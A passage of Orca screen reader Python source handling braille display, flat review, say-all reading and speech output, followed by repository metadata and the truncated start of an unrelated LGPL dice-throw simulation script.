if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: update review disabled")
return
context = self.getFlatReviewContext()
[regions, regionWithFocus] = context.getCurrentBrailleRegions()
if not regions:
regions = []
regionWithFocus = None
line = self.getNewBrailleLine()
self.addBrailleRegionsToLine(regions, line)
braille.setLines([line])
self.setBrailleFocus(regionWithFocus, False)
if regionWithFocus:
self.panBrailleToOffset(regionWithFocus.brailleOffset \
+ regionWithFocus.cursorOffset)
if self.justEnteredFlatReviewMode:
self.refreshBraille(True, self.targetCursorCell)
self.justEnteredFlatReviewMode = False
else:
self.refreshBraille(True, targetCursorCell)
def _setFlatReviewContextToBeginningOfBrailleDisplay(self):
"""Sets the character of interest to be the first character showing
at the beginning of the braille display."""
context = self.getFlatReviewContext()
[regions, regionWithFocus] = context.getCurrentBrailleRegions()
for region in regions:
if ((region.brailleOffset + len(region.string)) \
> braille.viewport[0]) \
and (isinstance(region, braille.ReviewText) \
or isinstance(region, braille.ReviewComponent)):
position = max(region.brailleOffset, braille.viewport[0])
offset = position - region.brailleOffset
self.targetCursorCell = region.brailleOffset \
- braille.viewport[0]
[word, charOffset] = region.zone.getWordAtOffset(offset)
if word:
self.flatReviewContext.setCurrent(
word.zone.line.index,
word.zone.index,
word.index,
charOffset)
else:
self.flatReviewContext.setCurrent(
region.zone.line.index,
region.zone.index,
0, # word index
0) # character index
break
def find(self, query=None):
"""Searches for the specified query. If no query is specified,
it searches for the query specified in the Orca Find dialog.
Arguments:
- query: The search query to find.
"""
if not query:
query = find.getLastQuery()
if query:
context = self.getFlatReviewContext()
location = query.findQuery(context, self.justEnteredFlatReviewMode)
if not location:
self.presentMessage(messages.STRING_NOT_FOUND)
else:
context.setCurrent(location.lineIndex, location.zoneIndex, \
location.wordIndex, location.charIndex)
self.reviewCurrentItem(None)
self.targetCursorCell = self.getBrailleCursorCell()
def getUnicodeCurrencySymbols(self):
"""Return a list of the unicode currency symbols, populating the list
if this is the first time that this routine has been called.
Returns a list of unicode currency symbols.
"""
if not self._unicodeCurrencySymbols:
self._unicodeCurrencySymbols = [ \
'\u0024', # dollar sign
'\u00A2', # cent sign
'\u00A3', # pound sign
'\u00A4', # currency sign
'\u00A5', # yen sign
'\u0192', # latin small letter f with hook
'\u060B', # afghani sign
'\u09F2', # bengali rupee mark
'\u09F3', # bengali rupee sign
'\u0AF1', # gujarati rupee sign
'\u0BF9', # tamil rupee sign
'\u0E3F', # thai currency symbol baht
'\u17DB', # khmer currency symbol riel
'\u2133', # script capital m
'\u5143', # cjk unified ideograph-5143
'\u5186', # cjk unified ideograph-5186
'\u5706', # cjk unified ideograph-5706
'\u5713', # cjk unified ideograph-5713
'\uFDFC', # rial sign
]
# Add 20A0 (EURO-CURRENCY SIGN) to 20B5 (CEDI SIGN)
#
for ordChar in range(ord('\u20A0'), ord('\u20B5') + 1):
self._unicodeCurrencySymbols.append(chr(ordChar))
return self._unicodeCurrencySymbols
def speakMisspeltWord(self, allTokens, badWord):
"""Called by various spell checking routine to speak the misspelt word,
plus the context that it is being used in.
Arguments:
- allTokens: a list of all the words.
- badWord: the misspelt word.
"""
# Create an utterance to speak consisting of the misspelt
# word plus the context where it is used (upto five words
# to either side of it).
#
for i in range(0, len(allTokens)):
if allTokens[i].startswith(badWord):
minIndex = i - 5
if minIndex < 0:
minIndex = 0
maxIndex = i + 5
if maxIndex > (len(allTokens) - 1):
maxIndex = len(allTokens) - 1
utterances = [messages.MISSPELLED_WORD % badWord]
contextPhrase = " ".join(allTokens[minIndex:maxIndex+1])
utterances.append(messages.MISSPELLED_WORD_CONTEXT % contextPhrase)
# Turn the list of utterances into a string.
text = " ".join(utterances)
speech.speak(text)
def textLines(self, obj, offset=None):
"""Creates a generator that can be used to iterate over each line
of a text object, starting at the caret offset.
Arguments:
- obj: an Accessible that has a text specialization
Returns an iterator that produces elements of the form:
[SayAllContext, acss], where SayAllContext has the text to be
spoken and acss is an ACSS instance for speaking the text.
"""
self._sayAllIsInterrupted = False
try:
text = obj.queryText()
except:
self._inSayAll = False
self._sayAllContexts = []
return
self._inSayAll = True
length = text.characterCount
if offset == None:
offset = text.caretOffset
# Determine the correct "say all by" mode to use.
#
sayAllStyle = _settingsManager.getSetting('sayAllStyle')
if sayAllStyle == settings.SAYALL_STYLE_SENTENCE:
mode = pyatspi.TEXT_BOUNDARY_SENTENCE_START
elif sayAllStyle == settings.SAYALL_STYLE_LINE:
mode = pyatspi.TEXT_BOUNDARY_LINE_START
else:
mode = pyatspi.TEXT_BOUNDARY_LINE_START
# Get the next line of text to read
#
done = False
while not done:
lastEndOffset = -1
while offset < length:
[lineString, startOffset, endOffset] = text.getTextAtOffset(
offset, mode)
# Some applications that don't support sentence boundaries
# will provide the line boundary results instead; others
# will return nothing.
#
if not lineString:
mode = pyatspi.TEXT_BOUNDARY_LINE_START
[lineString, startOffset, endOffset] = \
text.getTextAtOffset(offset, mode)
# [[[WDW - HACK: well...gnome-terminal sometimes wants to
# give us outrageous values back from getTextAtOffset
# (see http://bugzilla.gnome.org/show_bug.cgi?id=343133),
# so we try to handle it.]]]
#
if startOffset < 0:
break
# [[[WDW - HACK: this is here because getTextAtOffset
# tends not to be implemented consistently across toolkits.
# Sometimes it behaves properly (i.e., giving us an endOffset
# that is the beginning of the next line), sometimes it
# doesn't (e.g., giving us an endOffset that is the end of
# the current line). So...we hack. The whole 'max' deal
# is to account for lines that might be a brazillion lines
# long.]]]
#
if endOffset == lastEndOffset:
offset = max(offset + 1, lastEndOffset + 1)
lastEndOffset = endOffset
continue
lastEndOffset = endOffset
offset = endOffset
lineString = \
self.utilities.adjustForLinks(obj, lineString, startOffset)
lineString = self.utilities.adjustForRepeats(lineString)
if lineString.isupper():
voice = settings.voices[settings.UPPERCASE_VOICE]
else:
voice = settings.voices[settings.DEFAULT_VOICE]
context = speechserver.SayAllContext(
obj, lineString, startOffset, endOffset)
self._sayAllContexts.append(context)
yield [context, voice]
moreLines = False
relations = obj.getRelationSet()
for relation in relations:
if relation.getRelationType() \
== pyatspi.RELATION_FLOWS_TO:
obj = relation.getTarget(0)
try:
text = obj.queryText()
except NotImplementedError:
return
length = text.characterCount
offset = 0
moreLines = True
break
if not moreLines:
done = True
self._inSayAll = False
self._sayAllContexts = []
def getTextLineAtCaret(self, obj, offset=None, startOffset=None, endOffset=None):
"""To-be-removed. Returns the string, caretOffset, startOffset."""
try:
text = obj.queryText()
except NotImplementedError:
return ["", 0, 0]
# The caret might be positioned at the very end of the text area.
# In these cases, calling text.getTextAtOffset on an offset that's
# not positioned to a character can yield unexpected results. In
# particular, we'll see the Gecko toolkit return a start and end
# offset of (0, 0), and we'll see other implementations, such as
# gedit, return reasonable results (i.e., gedit will give us the
# last line).
#
# In order to accommodate the differing behavior of different
# AT-SPI implementations, we'll make sure we give getTextAtOffset
# the offset of an actual character. Then, we'll do a little check
# to see if that character is a newline - if it is, we'll treat it
# as the line.
#
if text.caretOffset == text.characterCount:
caretOffset = max(0, text.caretOffset - 1)
character = text.getText(caretOffset, caretOffset + 1)
else:
caretOffset = text.caretOffset
character = None
if (text.caretOffset == text.characterCount) \
and (character == "\n"):
lineString = ""
startOffset = caretOffset
else:
# Get the line containing the caret. [[[TODO: HACK WDW - If
# there's only 1 character in the string, well, we get it. We
# do this because Gecko's implementation of getTextAtOffset
# is broken if there is just one character in the string.]]]
#
if (text.characterCount == 1):
lineString = text.getText(caretOffset, caretOffset + 1)
startOffset = caretOffset
else:
if caretOffset == -1:
caretOffset = text.characterCount
try:
[lineString, startOffset, endOffset] = text.getTextAtOffset(
caretOffset, pyatspi.TEXT_BOUNDARY_LINE_START)
except:
return ["", 0, 0]
# Sometimes we get the trailing line-feed-- remove it
# It is important that these are in order.
# In some circumstances we might get:
# word word\r\n
# so remove \n, and then remove \r.
# See bgo#619332.
#
lineString = lineString.rstrip('\n')
lineString = lineString.rstrip('\r')
return [lineString, text.caretOffset, startOffset]
def phoneticSpellCurrentItem(self, itemString):
"""Phonetically spell the current flat review word or line.
Arguments:
- itemString: the string to phonetically spell.
"""
for (charIndex, character) in enumerate(itemString):
if character.isupper():
voice = settings.voices[settings.UPPERCASE_VOICE]
character = character.lower()
else:
voice = settings.voices[settings.DEFAULT_VOICE]
phoneticString = phonnames.getPhoneticName(character)
speech.speak(phoneticString, voice)
def _saveLastCursorPosition(self, obj, caretOffset):
"""Save away the current text cursor position for next time.
Arguments:
- obj: the current accessible
- caretOffset: the cursor position within this object
"""
self.pointOfReference["lastCursorPosition"] = [obj, caretOffset]
def _getCtrlShiftSelectionsStrings(self):
return [messages.PARAGRAPH_SELECTED_DOWN,
messages.PARAGRAPH_UNSELECTED_DOWN,
messages.PARAGRAPH_SELECTED_UP,
messages.PARAGRAPH_UNSELECTED_UP]
def _speakTextSelectionState(self, nSelections):
"""Hacky method to speak special cases without any valid sanity
checking. It is not long for this world. Do not call it."""
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return False
eventStr, mods = self.utilities.lastKeyAndModifiers()
isControlKey = mods & keybindings.CTRL_MODIFIER_MASK
isShiftKey = mods & keybindings.SHIFT_MODIFIER_MASK
selectedText = nSelections > 0
line = None
if (eventStr == "Page_Down") and isShiftKey and isControlKey:
line = messages.LINE_SELECTED_RIGHT
elif (eventStr == "Page_Up") and isShiftKey and isControlKey:
line = messages.LINE_SELECTED_LEFT
elif (eventStr == "Page_Down") and isShiftKey and not isControlKey:
if selectedText:
line = messages.PAGE_SELECTED_DOWN
else:
line = messages.PAGE_UNSELECTED_DOWN
elif (eventStr == "Page_Up") and isShiftKey and not isControlKey:
if selectedText:
line = messages.PAGE_SELECTED_UP
else:
line = messages.PAGE_UNSELECTED_UP
elif (eventStr == "Down") and isShiftKey and isControlKey:
strings = self._getCtrlShiftSelectionsStrings()
if selectedText:
line = strings[0]
else:
line = strings[1]
elif (eventStr == "Up") and isShiftKey and isControlKey:
strings = self._getCtrlShiftSelectionsStrings()
if selectedText:
line = strings[2]
else:
line = strings[3]
elif (eventStr == "Home") and isShiftKey and isControlKey:
if selectedText:
line = messages.DOCUMENT_SELECTED_UP
else:
line = messages.DOCUMENT_UNSELECTED_UP
elif (eventStr == "End") and isShiftKey and isControlKey:
if selectedText:
line = messages.DOCUMENT_SELECTED_DOWN
else:
line = messages.DOCUMENT_SELECTED_UP
elif (eventStr == "A") and isControlKey and selectedText:
line = messages.DOCUMENT_SELECTED_ALL
if line:
speech.speak(line, None, False)
return True
return False
def systemBeep(self):
"""Rings the system bell. This is really a hack. Ideally, we want
a method that will present an earcon (any sound designated for the
purpose of representing an error, event etc)
"""
print("\a")
def speakWordUnderMouse(self, acc):
"""Determine if the speak-word-under-mouse capability applies to
the given accessible.
Arguments:
- acc: Accessible to test.
Returns True if this accessible should provide the single word.
"""
return acc and acc.getState().contains(pyatspi.STATE_EDITABLE)
def speakMisspelledIndicator(self, obj, offset):
"""Speaks an announcement indicating that a given word is misspelled.
Arguments:
- obj: An accessible which implements the accessible text interface.
- offset: Offset in the accessible's text for which to retrieve the
attributes.
"""
verbosity = _settingsManager.getSetting('speechVerbosityLevel')
if verbosity == settings.VERBOSITY_LEVEL_VERBOSE:
try:
text = obj.queryText()
except:
return
# If we're on whitespace, we cannot be on a misspelled word.
#
charAndOffsets = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_CHAR)
if not charAndOffsets[0].strip() \
or self.utilities.isWordDelimiter(charAndOffsets[0]):
self._lastWordCheckedForSpelling = charAndOffsets[0]
return
wordAndOffsets = \
text.getTextAtOffset(offset, pyatspi.TEXT_BOUNDARY_WORD_START)
if self.utilities.isWordMisspelled(obj, offset) \
and wordAndOffsets[0] != self._lastWordCheckedForSpelling:
self.speakMessage(messages.MISSPELLED)
# Store this word so that we do not continue to present the
# presence of the red squiggly as the user arrows amongst
# the characters.
#
self._lastWordCheckedForSpelling = wordAndOffsets[0]
############################################################################
# #
# Presentation methods #
# (scripts should not call methods in braille.py or speech.py directly) #
# #
############################################################################
def presentationInterrupt(self):
"""Convenience method to interrupt presentation of whatever is being
presented at the moment."""
speech.stop()
braille.killFlash()
def presentKeyboardEvent(self, event):
"""Convenience method to present the KeyboardEvent event. Returns True
if we fully present the event; False otherwise."""
if not event.isPressedKey():
self._sayAllIsInterrupted = False
if not orca_state.learnModeEnabled:
if event.shouldEcho == False or event.isOrcaModified():
return False
try:
role = orca_state.locusOfFocus.getRole()
except:
return False
if role == pyatspi.ROLE_PASSWORD_TEXT:
return False
# Worst. Hack. EVER. We have no reliable way of knowing a password is
# being entered into a terminal -- other than the fact that the text
# typed ain't there. As a result, we have to do special things when
# not in special modes. :( See bgo 668025.
if role == pyatspi.ROLE_TERMINAL:
if not event.isPressedKey():
try:
text = orca_state.locusOfFocus.queryText()
o = text.caretOffset
string = text.getText(o-1, o)
except:
pass
else:
if not event.event_string in [string, 'space']:
return False
elif not (orca_state.learnModeEnabled or event.isLockingKey()):
return False
elif not event.isPressedKey():
return False
debug.println(debug.LEVEL_FINEST,
"Script.presentKeyboardEvent: %s" % event.event_string)
braille.displayKeyEvent(event)
orcaModifierPressed = event.isOrcaModifier() and event.isPressedKey()
if event.isCharacterEchoable() and not orcaModifierPressed:
return False
if orca_state.learnModeEnabled:
if event.isPrintableKey() and event.getClickCount() == 2:
self.phoneticSpellCurrentItem(event.event_string)
return True
speech.speakKeyEvent(event)
return True
def presentMessage(self, fullMessage, briefMessage=None, voice=None):
"""Convenience method to speak a message and 'flash' it in braille.
Arguments:
- fullMessage: This can be a string or a list. This will be presented
as the message for users whose flash or message verbosity level is
verbose.
- briefMessage: This can be a string or a list. This will be presented
as the message for users whose flash or message verbosity level is
brief. Note that providing no briefMessage will result in the full
message being used for either. Callers wishing to present nothing as
the briefMessage should set briefMessage to an empty string.
- voice: The voice to use when speaking this message. By default, the
"system" voice will be used.
"""
if not fullMessage:
return
if briefMessage is None:
briefMessage = fullMessage
if _settingsManager.getSetting('enableSpeech'):
currentCapStyle = _settingsManager.getSetting('capitalizationStyle')
_settingsManager.setSetting(
'capitalizationStyle', settings.CAPITALIZATION_STYLE_NONE)
speech.updateCapitalizationStyle()
if _settingsManager.getSetting('messageVerbosityLevel') \
== settings.VERBOSITY_LEVEL_BRIEF:
message = briefMessage
else:
message = fullMessage
if message:
voice = voice or self.voices.get(settings.SYSTEM_VOICE)
speech.speak(message, voice)
_settingsManager.setSetting('capitalizationStyle', currentCapStyle)
speech.updateCapitalizationStyle()
if (_settingsManager.getSetting('enableBraille') \
or _settingsManager.getSetting('enableBrailleMonitor')) \
and _settingsManager.getSetting('enableFlashMessages'):
if _settingsManager.getSetting('flashVerbosityLevel') \
== settings.VERBOSITY_LEVEL_BRIEF:
message = briefMessage
else:
message = fullMessage
if not message:
return
if isinstance(message[0], list):
message = message[0]
if isinstance(message, list):
message = [i for i in message if isinstance(i, str)]
message = " ".join(message)
if _settingsManager.getSetting('flashIsPersistent'):
duration = -1
else:
duration = _settingsManager.getSetting('brailleFlashTime')
braille.displayMessage(message, flashTime=duration)
@staticmethod
def addBrailleRegionToLine(region, line):
"""Adds the braille region to the line.
Arguments:
- region: a braille.Region (e.g. what is returned by the braille
generator's generateBraille() method.
- line: a braille.Line
"""
line.addRegion(region)
@staticmethod
def addBrailleRegionsToLine(regions, line):
"""Adds the braille region to the line.
Arguments:
- regions: a series of braille.Region instances (a single instance
being what is returned by the braille generator's generateBraille()
method.
- line: a braille.Line
"""
line.addRegions(regions)
@staticmethod
def addToLineAsBrailleRegion(string, line):
"""Creates a Braille Region out of string and adds it to the line.
Arguments:
- string: the string to be displayed
- line: a braille.Line
"""
line.addRegion(braille.Region(string))
@staticmethod
def brailleRegionsFromStrings(strings):
"""Creates a list of braille regions from the list of strings.
Arguments:
- strings: a list of strings from which to create the list of
braille Region instances
Returns the list of braille Region instances
"""
brailleRegions = []
for string in strings:
brailleRegions.append(braille.Region(string))
return brailleRegions
@staticmethod
def clearBraille():
"""Clears the logical structure, but keeps the Braille display as is
(until a refresh operation)."""
braille.clear()
@staticmethod
def displayBrailleMessage(message, cursor=-1, flashTime=0):
"""Displays a single line, setting the cursor to the given position,
ensuring that the cursor is in view.
Arguments:
- message: the string to display
- cursor: the 0-based cursor position, where -1 (default) means no
cursor
- flashTime: if non-0, the number of milliseconds to display the
regions before reverting back to what was there before. A 0 means
to not do any flashing. A negative number means to display the
message until some other message comes along or the user presses
a cursor routing key.
"""
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: display message disabled")
return
braille.displayMessage(message, cursor, flashTime)
@staticmethod
def displayBrailleRegions(regionInfo, flashTime=0):
"""Displays a list of regions on a single line, setting focus to the
specified region. The regionInfo parameter is something that is
typically returned by a call to braille_generator.generateBraille.
Arguments:
- regionInfo: a list where the first element is a list of regions
to display and the second element is the region with focus (must
be in the list from element 0)
- flashTime: if non-0, the number of milliseconds to display the
regions before reverting back to what was there before. A 0 means
to not do any flashing. A negative number means to display the
message until some other message comes along or the user presses
a cursor routing key.
"""
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: display regions disabled")
return
braille.displayRegions(regionInfo, flashTime)
def displayBrailleForObject(self, obj):
"""Convenience method for scripts combining the call to the braille
generator for the script with the call to displayBrailleRegions.
Arguments:
- obj: the accessible object to display in braille
"""
regions = self.brailleGenerator.generateBraille(obj)
self.displayBrailleRegions(regions)
@staticmethod
def getBrailleCaretContext(event):
"""Gets the accesible and caret offset associated with the given
event. The event should have a BrlAPI event that contains an
argument value that corresponds to a cell on the display.
Arguments:
- event: an instance of input_event.BrailleEvent. event.event is
the dictionary form of the expanded BrlAPI event.
"""
return braille.getCaretContext(event)
@staticmethod
def getBrailleCursorCell():
"""Returns the value of position of the braille cell which has the
cursor. A value of 0 means no cell has the cursor."""
return braille.cursorCell
@staticmethod
def getNewBrailleLine(clearBraille=False, addLine=False):
"""Creates a new braille Line.
Arguments:
- clearBraille: Whether the display should be cleared.
- addLine: Whether the line should be added to the logical display
for painting.
Returns the new Line.
"""
if clearBraille:
braille.clear()
line = braille.Line()
if addLine:
braille.addLine(line)
return line
@staticmethod
def getNewBrailleComponent(accessible, string, cursorOffset=0,
indicator='', expandOnCursor=False):
"""Creates a new braille Component.
Arguments:
- accessible: the accessible associated with this region
- string: the string to be displayed
- cursorOffset: a 0-based index saying where to draw the cursor
for this Region if it gets focus
Returns the new Component.
"""
return braille.Component(accessible, string, cursorOffset,
indicator, expandOnCursor)
@staticmethod
def getNewBrailleRegion(string, cursorOffset=0, expandOnCursor=False):
"""Creates a new braille Region.
Arguments:
- string: the string to be displayed
- cursorOffset: a 0-based index saying where to draw the cursor
for this Region if it gets focus
Returns the new Region.
"""
return braille.Region(string, cursorOffset, expandOnCursor)
@staticmethod
def getNewBrailleText(accessible, label="", eol="", startOffset=None,
endOffset=None):
"""Creates a new braille Text region.
Arguments:
- accessible: the accessible associated with this region and which
implements AtkText
- label: an optional label to display
- eol: the endOfLine indicator
Returns the new Text region.
"""
return braille.Text(accessible, label, eol, startOffset, endOffset)
@staticmethod
def isBrailleBeginningShowing():
"""If True, the beginning of the line is showing on the braille
display."""
return braille.beginningIsShowing
@staticmethod
def isBrailleEndShowing():
"""If True, the end of the line is showing on the braille display."""
return braille.endIsShowing
@staticmethod
def panBrailleInDirection(panAmount=0, panToLeft=True):
"""Pans the display to the left, limiting the pan to the beginning
of the line being displayed.
Arguments:
- panAmount: the amount to pan. A value of 0 means the entire
width of the physical display.
- panToLeft: if True, pan to the left; otherwise to the right
Returns True if a pan actually happened.
"""
if panToLeft:
return braille.panLeft(panAmount)
else:
return braille.panRight(panAmount)
@staticmethod
def panBrailleToOffset(offset):
"""Automatically pan left or right to make sure the current offset
is showing."""
braille.panToOffset(offset)
@staticmethod
def presentItemsInBraille(items):
"""Method to braille a list of items. Scripts should call this
method rather than handling the creation and displaying of a
braille line directly.
Arguments:
- items: a list of strings to be presented
"""
line = braille.getShowingLine()
for item in items:
line.addRegion(braille.Region(" " + item))
braille.refresh()
def updateBrailleForNewCaretPosition(self, obj):
"""Try to reposition the cursor without having to do a full update."""
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: update caret disabled")
return
brailleNeedsRepainting = True
line = braille.getShowingLine()
for region in line.regions:
if isinstance(region, braille.Text) and region.accessible == obj:
if region.repositionCursor():
self.refreshBraille(True)
brailleNeedsRepainting = False
break
if brailleNeedsRepainting:
self.updateBraille(obj)
@staticmethod
def refreshBraille(panToCursor=True, targetCursorCell=0, getLinkMask=True,
stopFlash=True):
"""This is the method scripts should use to refresh braille rather
than calling self.refreshBraille() directly. The intent is to centralize
such calls into as few places as possible so that we can easily and
safely not perform braille-related functions for users who do not
have braille and/or the braille monitor enabled.
Arguments:
- panToCursor: if True, will adjust the viewport so the cursor is
showing.
- targetCursorCell: Only effective if panToCursor is True.
0 means automatically place the cursor somewhere on the display so
as to minimize movement but show as much of the line as possible.
A positive value is a 1-based target cell from the left side of
the display and a negative value is a 1-based target cell from the
right side of the display.
- getLinkMask: Whether or not we should take the time to get the
attributeMask for links. Reasons we might not want to include
knowing that we will fail and/or it taking an unreasonable
amount of time (AKA Gecko).
- stopFlash: if True, kill any flashed message that may be showing.
"""
braille.refresh(panToCursor, targetCursorCell, getLinkMask, stopFlash)
@staticmethod
def setBrailleFocus(region, panToFocus=True, getLinkMask=True):
"""Specififes the region with focus. This region will be positioned
at the home position if panToFocus is True.
Arguments:
- region: the given region, which much be in a line that has been
added to the logical display
- panToFocus: whether or not to position the region at the home
position
- getLinkMask: Whether or not we should take the time to get the
attributeMask for links. Reasons we might not want to include
knowning that we will fail and/or it taking an unreasonable
amount of time (AKA Gecko).
"""
braille.setFocus(region, panToFocus, getLinkMask)
@staticmethod
def _setContractedBraille(event):
"""Turns contracted braille on or off based upon the event.
Arguments:
- event: an instance of input_event.BrailleEvent. event.event is
the dictionary form of the expanded BrlAPI event.
"""
braille.setContractedBraille(event)
########################################################################
# #
# Speech methods #
# (scripts should not call methods in speech.py directly) #
# #
########################################################################
def speakCharacter(self, character):
"""Method to speak a single character. Scripts should use this
method rather than calling speech.speakCharacter directly."""
if character.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
spokenCharacter = chnames.getCharacterName(character)
speech.speakCharacter(spokenCharacter, voice)
def speakMessage(self, string, voice=None, interrupt=True):
"""Method to speak a single string. Scripts should use this
method rather than calling speech.speak directly.
- string: The string to be spoken.
- voice: The voice to use. By default, the "system" voice will
be used.
- interrupt: If True, any current speech should be interrupted
prior to speaking the new text.
"""
if _settingsManager.getSetting('enableSpeech'):
voice = voice or self.voices.get(settings.SYSTEM_VOICE)
speech.speak(string, voice, interrupt)
@staticmethod
def presentItemsInSpeech(items):
"""Method to speak a list of items. Scripts should call this
method rather than handling the creation and speaking of
utterances directly.
Arguments:
- items: a list of strings to be presented
"""
utterances = []
for item in items:
utterances.append(item)
speech.speak(utterances)
def speakUnicodeCharacter(self, character):
""" Speaks some information about an unicode character.
At the Momment it just anounces the character unicode number but
this information may be changed in the future
Arguments:
- character: the character to speak information of
"""
speech.speak(messages.UNICODE % \
self.utilities.unicodeValueString(character))
def presentTime(self, inputEvent):
""" Presents the current time. """
timeFormat = _settingsManager.getSetting('presentTimeFormat')
message = time.strftime(timeFormat, time.localtime())
self.presentMessage(message)
return True
def presentDate(self, inputEvent):
""" Presents the current date. """
dateFormat = _settingsManager.getSetting('presentDateFormat')
message = time.strftime(dateFormat, time.localtime())
self.presentMessage(message)
return True
|
pvagner/orca
|
src/orca/scripts/default.py
|
Python
|
lgpl-2.1
| 175,590
|
#!/usr/bin/env python
"""A command-line tool for simulating various dice throw situations.
Copyright (C) 2014-2018 Simon Muller
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""
import argparse
import random
from collections import OrderedDict
from copy import copy
__author__ = "Simon Muller"
__copyright__ = "Copyright 2014-2018, Simon Muller"
__version__ = "1.0.0"
def roll_die(sides=6):
"""Throw one die and return it's result."""
return random.randint(1, sides)
def roll_dice(num=2, sides=6):
"""Throw multiple dice and return their results."""
if type(sides) == int:
return [roll_die(sides) for _ in range(num)]
elif type(sides) == list:
assert len(sides) == num
return [roll_die(s) for s in sides]
def reroll_dice(rerolls=3, num=2, sides=6):
"""Performs multiple dice rolls and and returns their results."""
return [roll_dice(num, sides) for _ in range(rerolls)]
def keep_value(outcome, values_of_interest):
"""A keep strategy that keeps all dices that land on the given values."""
return [d for d in outcome if d in values_of_interest]
def keep_none(outcome, values_of_interest=None):
"""A keep strategy that never keeps any dice."""
return []
def keep_unique(outcome, values_of_interest=None):
"""A keep strategy that throws away duplicates."""
return list(set(outcome))
def keep_duplicates(outcome, values_of_interest=None):
"""A keep strategy that keeps only duplicates."""
return [d for d in outcome if outcome.count(d) > 1]
def keep_some_unique(outcome, num=5):
"""A keep strategy that throws away duplicates, but never keeps more than 'num' dice."""
s = set(outcome)
while len(s) > num:
_ = s.pop()
return list(s)
def order_dice(outcome, values_of_interest):
"""A reduction function for a set of dice values where order doesn't matter."""
if len(values_of_interest) == 0:
return tuple(sorted(outcome))
for value in copy(outcome):
# Completely ignore dice that don't have values of interest
if value not in values_of_interest:
outcome.remove(value)
return tuple(sorted(outcome))
def count_unique(outcome, values_of_interest):
"""A reduction function for counting how many values are unique."""
return len(set(outcome))
def sum_values(outcome, values_of_interest):
"""A reduction function for summing the values in a result."""
if len(values_of_interest) == 0:
return sum(outcome)
# Only sum dice with values of interest
total = 0
for value in values_of_interest:
total += outcome.count(value) * value
return total
def count_values(outcome, values_of_interest):
"""A reduction function for counting the number of given values on a result."""
count = 0
for value in values_of_interest:
count += outcome.count(value)
return count
def dice_throw(outcome, values_of_interest):
"""A reduction function that keeps the precise result of the dice throws (including order)."""
return tuple(outcome)
def reroll_dice_with_choice(keep_strategy=keep_none, rerolls=3, num=2, sides=6):
"""Perform multiple rerolls, but with the choice to keep some dice the same
and reroll all the others. Return all rolls."""
outcomes = [roll_dice(num, sides)]
for i in range(rerolls - 1):
prev_outcome = copy(outcomes[-1])
to_keep = keep_strategy(prev_outcome)
new_outcome = []
for d in to_keep:
if d in prev_outcome:
new_outcome.append(d)
prev_outcome.remove(d)
else:
assert False, "Keep_strategy() result is corrupt: {} from {}"\
.format(to_keep, prev_outcome)
new_outcome.extend(roll_dice(num - len(new_outcome), sides))
outcomes.append(new_outcome)
return outcomes
def reroll_dice_with_choice_last_only(keep_strategy=keep_none, rerolls=3, num=2, sides=6):
"""Perform multiple rerolls with choice, but only return the final result."""
outcomes = reroll_dice_with_choice(keep_strategy, rerolls, num, sides)
outcome = outcomes[-1]
return outcome
def reduce_many_dice_rolls(action=sum, times=100, num=2, sides=6):
"""Roll multiple dice many times and each time perform some action
on the dice to calculate a single value. Return results as a generator."""
return (action(roll_dice(num, sides)) for _ in range(times))
def run_many_times(func, times=100):
"""Create a generator that returns the result of running the given function
multiple times."""
return (func() for _ in range(times))
def count_outcomes(values):
"""Count the number of identical outcomes and return histogram."""
count_dict = {}
for value in values:
# The outcome values have to be hashable to be inserted into dict
# Outcomes containing lists should therefore be converted to tuples
if value in count_dict:
count_dict[value] += 1
else:
count_dict[value] = 1
return count_dict
def count_total_events(hist):
"""Sum the number of values in a histogram (which are values in a dictionary)."""
total = 0
# Count total number of events
for key in hist:
total += hist[key]
return total
def hist_counts_to_probabilities(hist):
"""Convert a histogram of event counts into probabilities."""
total = count_total_events(hist)
# Divide number of events by total to get probabilities
for k, v in hist.items():
hist[k] = (v / float(total))
return hist
def run_multiple_times_and_print_stats(func, N=100, use_percentages=False):
"""Run a function N times and print out a histogram of the results."""
outcomes = run_many_times(func, times=N)
hist = count_outcomes(outcomes)
if use_percentages:
odds = hist_counts_to_probabilities(hist)
# Use an ordered dict so that we can print with sorted keys
odds = OrderedDict(sorted(odds.items()))
for k, v in odds.items():
# Print probabilities as percentages
print("{}: {:>5.2f} %".format(k, 100*v))
else:
total = count_total_events(hist)
# Use an ordered dict so that we can print with sorted keys
hist = OrderedDict(sorted(hist.items()))
for k, v in hist.items():
print("{}: {:>{width}} out of {}".format(k, v, total, width=len(str(total))))
REDUCE_ARG_OPTIONS = {
"sum": (sum_values, "total sum of dice values in a throw"),
"order": (order_dice, "ordered dice values"),
"count": (count_values, "number of dice with the value {}"),
"unique": (count_unique, "number of unique dice in a throw"),
"values": (dice_throw, "dice values"),
}
def parse_arg_reduce_function(args):
"""Parse command-line arguments for the reduce function."""
if len(args) == 0:
args = ["sum"]
if args[0] in REDUCE_ARG_OPTIONS:
func = REDUCE_ARG_OPTIONS[args[0]][0]
details = REDUCE_ARG_OPTIONS[args[0]][1]
else:
raise Exception("'--stats' parameter has to specify a valid reduction function, " +
" not '{}'. Valid options are: {}".format(args[0], REDUCE_ARG_OPTIONS.keys()))
reduce_args = []
for arg in args[1:]:
reduce_args.append(int(arg))
return func, reduce_args, (details.format(reduce_args))
KEEP_ARG_OPTIONS = {
